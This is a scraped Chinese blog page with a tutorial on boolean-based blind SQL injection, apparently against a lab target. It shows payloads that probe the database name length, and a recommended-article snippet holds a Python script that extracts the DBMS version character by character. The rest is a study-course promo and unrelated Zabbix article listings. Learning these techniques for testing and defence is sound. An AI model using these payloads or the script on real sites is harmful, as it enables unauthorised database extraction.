SQL注入-布尔盲注_布尔注入length()

最新推荐文章于 2025-02-15 12:28:55 发布
最新推荐文章于 2025-02-15 12:28:55 发布
阅读量312 收藏 1
点赞数 1
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84264536/article/details/139943481
版权

我们再给一个不存在的id , ?id=-1 , id肯定不能为负数,数据库查不到,肯定是登录不成功

只有登录成功和失败两种情况 ,  页面没有显示位也没有报错 , 满足布尔盲注的条件

接下来测试注入点 , 已知id=1时可以正常登录 , 我们给它加个单引号’ , 看会不会对结果造成影响

登录失败 , id=1正常登录 , 但加了个单引号’ 就登录失败 , 说明单引号’ 会影响SQL的执行,即 存在注入

我们再加一个true , 使SQL恒成立 , 又登录成功了

改成false , 使SQL恒不成立 , 又登录失败了

至此 , 我们可以确定 , 后端的SQL使用单引号’ 来包裹参数 , 固 单引号字符串型注入

第二步,脱库

我们使用 length() 判断当前使用的数据库的名字的长度

?id=1' and length(database())>1 -- a

如果数据库名字的长度大于1 , 那上面的 length(database())>1 的结果就是 true , 也就是这样

?id=1' and true -- a

使SQL恒成立 , 从而登录成功

长度从1开始测试 , 每次加一个长度 , 当长度不满足条件时 , 比如

?id=1' and length(database())>8 -- a

如果长度不大于8 , 那 length(database())>8 的结果就是 false , 也就是这样

?id=1' and false -- a

使SQL恒不成立 , 从而登录不成功 , 由此我们可知 , 数据库名字的长度为 8

判断完长度以后 , 我们再猜数据库的名字



### 一、网安学习成长路线图


网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/aa7be04dc8684d7ea43acc0151aebbf1.png)


### 二、网安视频合集


观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f0aeee2eec7a48f4ad7d083932cb095d.png)


### 三、精品网安学习书籍


当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/078ea1d4cda342f496f9276a4cda5fcf.png)


### 四、网络安全源码合集+工具包


光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e54c0bac8f3049928b488dc1e5080fc5.png)


### 五、网络安全面试题


最后就是大家最关心的网络安全面试题板块  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/15c1192cad414044b4dd41f3df44433d.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/b07abbfab1fd4edc800d7db3eabb956e.png)
2401_84264536
关注
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
zabbix系列:agent2 VS agent
NIO4444
01-02 4429
agent2 VS agent 对比项 Zabbix agent Zabbix agent 2 编程语言 C Go (含部分C语言实现) 是否守护进程 是 否 ( 5.0.4开始,Windows是守护进程) 支持扩展 C语言开发模块 GO语言插件 平台要求 支持平台 Linux, IBM AIX, FreeBSD, NetBSD, OpenBSD, HP-UX, MacOSX, Solaris: 9, 10, 1...
zabbix_agent2-5.0.2-windows-amd64-static.zip
07-22
zabbix_agent2-5.0.2-windows-amd64-static.zip zabbix agent2-5.0.2 windows 64位客户端
Zabbix【部署 04】 Windows系统安装配置agent及agent2
Java与大数据相关实践内容分享!
03-30 4855
Windows系统安装配置agent及agent2
下载安装zabbix_agent2,启动zabbix_agent2
m0_73982523的博客
07-04 1716
4.右击zabbix_agent2,如果程序是启动的,点击‘重新启动’,否则点击‘启动’找到ServerActive并修改为 服务端ip(主动模式)找到Hostname并修改为 自己的ip地址(可以看第三点)(tips:上述如果有错误,欢迎大佬来指正!找到Server 并修改为 ‘服务端ip’2.输入services.msc 回车。右击,点击‘打开方式’,选择‘记事本’打开。1.按Windows+r 键弹出运行框。第三步 搜索ServerActive。第一步 按ctrl+F 键。
zabbix-agent,zabbix_agentd和zabbix-agent2,zabbix_agent2的区别
qq_37263429的博客
06-07 681
zabbix-agent,zabbix_agentd和zabbix-agent2,zabbix_agent2的区别
Linux和Windows下zabbix agent2安装和主动注册,附带Linux安装脚本
AZerork的博客
10-13 5607
最近新搭建了一台zabbix监控中心,陆续给公司的服务器装上zabbix-agent监控,刚好有点时间,偷闲记录下安装的过程。 目录zabbix agent2安装Linux下安装zabbix agent2在线安装离线安装Windows下安装zabbix agent2主动注册Linux一键安装脚本脚本内容结尾 zabbix agent2安装 zabbix server端在这里就不在赘述,本文主讲的是agent端搭建,可自行浏览其他文章学习搭建zabbix server端。 Linux下安装zabbix age
2024年Python最全Python自动化sql注入布尔盲注_布尔盲注脚本
2301_82244514的博客
04-30 777
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 571
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 3348
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL注入——布尔盲注
TGFXK的博客
03-21 415
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
zabbix-agent监控windows
03-27
zabbix-agent监控windows server,下载后解压放到C盘即可。 使用步骤参考“zabbix-agentd监控Windows主机” https://blog.youkuaiyun.com/PlatoWG/article/details/88849542
zabbix-agent 和zabbix-agent2监控mysql的区别
rain_fan的博客
08-27 8239
一、zabbix-agent 和zabbix-agent2的区别 zabbix-agent2是升级版,降低了与server之间的TCP连接数,具有更大的检查并发性,易于通过插件进行扩展。agent2部分使用go语言开发。和agent一样支持主动模式和被动模式。 两者监控mysql的区别: **相同点:**两者都需要创建监控用户并授权,两者都需要调用自身的模板,模板不通用。 CREATE USER ‘zbx_monitor’@’%’ IDENTIFIED BY ‘’; GRANT REPLICATION CL
zabbix监控windows系统(2)
" DevOps菜鸟(Xu JieHao)" 的博客
04-15 651
Agent 2是agent的升级版无论是在性能、安全性、灵活性和兼容性方面都比传统agent有一些优势和改进
Zabbix-agents (windows环境)安装及配置
Lzcsfg的博客
05-18 6693
Zabbix 由服务端和客户端两部分组成,分别是 Zabbix 服务器(Server)和 Zabbix 代理(Agent)。它们共同协作实现对整个 IT 环境的监控。
zabbix_agentd_2.2.0 windows 安装过程
qq_19747527的博客
03-28 266
四个步骤教会你安装。 配置文件解压到d盘 cmd命令 直接执行以下四个命令 安装 D:\zabbix\bin\win64\zabbix_agentd.exe -c D:\zabbix\conf\zabbix_agentd.win.conf -i 启动 D:\zabbix\bin\win64\zabbix_agentd.exe -c D:\zabbix\conf\zabbix_agen
Zabbix之zabbix-agent(windows环境)安装及配置
热门推荐
月生的静心苑
03-13 2万+
zabbix-agent支持linux、window、AIX、macos等几乎所有的操作系统。下面介绍window环境下zabbix-agent msi安装包安装配置步骤。
Windows Server上安装部署Zabbix agent
Jian Sun_的博客
02-15 859
找到conf下的配置文件 zabbix_agentd.win.conf ,修改LogFile、Server、ServerActive 、Hostname这几个参数。笔者参考别人文章的脚本,下面为Windows批处理脚本zabbix-agentd.bat对客户端服务器上的zabbix_agentd进行安装、启动、停止、卸载。根据自己环境定义zabbix的解压目录,注意防火墙问题,配置文件问题。2、bin文件存放windows下32位和64位安装程序。根据上图步骤,依次添加,完成入站规则的添加。
运维系列&Windows系列:Zabbix agent一键部署-windows版本(windows 安装zabbix客户端安装、bat文件修改文件内容)
weixin_54626591的博客
12-04 5648
Zabbix agent一键部署-windows版本(windows 安装zabbix客户端安装、bat文件修改文件内容)
sql注入布尔盲注 脚本‘
最新发布
03-08
### SQL 注入布尔盲注攻击原理 布尔盲注是一种特殊的SQL注入技术,在这种情况下,应用程序不会返回任何错误消息或查询结果给攻击者。相反,通过发送特制的请求并观察应用响应的变化来推断数据库中的数据[^2]。 ### 布尔盲注攻击示例 为了演示如何利用布尔盲注漏洞,下面是一个简单的Python脚本例子: ```python import requests target_url = "http://example.com/vulnerable_page" true_condition_response_length = None def get_true_condition_response(): payload = "?id=1 AND 1=1" response = requests.get(target_url + payload) return len(response.text) def is_true_condition(payload): global true_condition_response_length if not true_condition_response_length: true_condition_response_length = get_true_condition_response() response = requests.get(target_url + payload) return len(response.text) == true_condition_response_length def extract_version_number(): version = "" for position in range(1, 9): # Assuming max length of version number as 8 found_char = False for char_code in range(32, 127): # ASCII printable characters test_payload = f"?id=1 AND ascii(substring(@@version,{position},1))={char_code}" if is_true_condition(test_payload): version += chr(char_code) print(f"[+] Found character {chr(char_code)} at position {position}") found_char = True break if not found_char: break return version if __name__ == "__main__": dbms_version = extract_version_number() print(f"The extracted DBMS version is: {dbms_version}") ``` 此代码片段展示了如何使用布尔条件判断服务器对于不同输入做出的不同反应,从而逐步获取有关底层数据库的信息。请注意这仅用于教育目的,并不应在未经授权的情况下测试真实网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值